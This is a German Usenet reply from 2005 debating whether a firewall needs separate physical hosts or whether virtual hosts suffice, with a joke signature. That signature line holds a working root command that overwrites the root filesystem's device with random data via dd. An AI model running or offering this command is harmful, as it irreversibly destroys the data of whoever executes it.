Re: Wozu "ipcop"?

On 2005-04-20, Matthias Houdek <linux@houdek.de> wrote:

> Eine vernünftige Firewall besteht aus mehr als einem Host.

Das lässt sich ja auch mit virtuellen Hosts realisieren :-)

> Ist der erste gehackt, gibt es Alarmstufe "Orange", FW2 macht die
> Schotten dicht und die FW1 wird erneuert.
> Die alte FW1 wird dann analysiert (Wer hat sich wie welchen Zugriff
> verschafft?).

Das schließt ein, daß du merkst, dass die Feierwand gehackt wurde. Was
aber, wenn nicht? Dann ist es grad wurscht, ob ein "echter" oder
"virtueller" host gehackt würde.

> Alles andere ist zumindest für ein Firmennetz mit sensiblen/wichtigen
> Daten nichts anderes als Augenwischerei.

Ich denke, das für viele Belange eine Feierwand mit vservern ausreichen
würde. In Hochsicherheitstrakten mag das anders aussehen.

--
     Chrissie

su -c "dd if=/dev/urandom of=`mount |grep 'on / ' |awk '{print $1;}'`"